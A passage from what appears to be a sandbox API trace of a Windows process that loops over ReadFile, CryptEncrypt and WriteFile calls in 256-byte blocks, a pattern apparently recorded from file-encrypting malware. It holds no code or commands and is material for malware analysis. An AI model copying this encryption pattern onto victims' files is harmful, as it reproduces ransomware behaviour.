lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.239] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.239] GetLastError () returned 0x0 [0167.239] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.239] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.240] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.240] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.240] GetLastError () returned 0x0 [0167.240] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.241] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.241] GetLastError () returned 0x0 [0167.241] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.241] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.241] GetLastError () returned 0x0 [0167.241] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.241] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.241] GetLastError () returned 0x0 [0167.241] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.241] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.241] GetLastError () returned 0x0 [0167.241] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.241] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.241] GetLastError () returned 0x0 [0167.241] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.241] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.242] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.242] GetLastError () returned 0x0 [0167.242] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.242] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.243] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.243] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.243] GetLastError () returned 0x0 [0167.243] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.244] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.244] GetLastError () returned 0x0 [0167.244] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.244] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.244] GetLastError () returned 0x0 [0167.244] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.244] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.244] GetLastError () returned 0x0 [0167.244] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.244] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.244] GetLastError () returned 0x0 [0167.244] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.244] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.244] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.244] GetLastError () returned 0x0 [0167.244] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 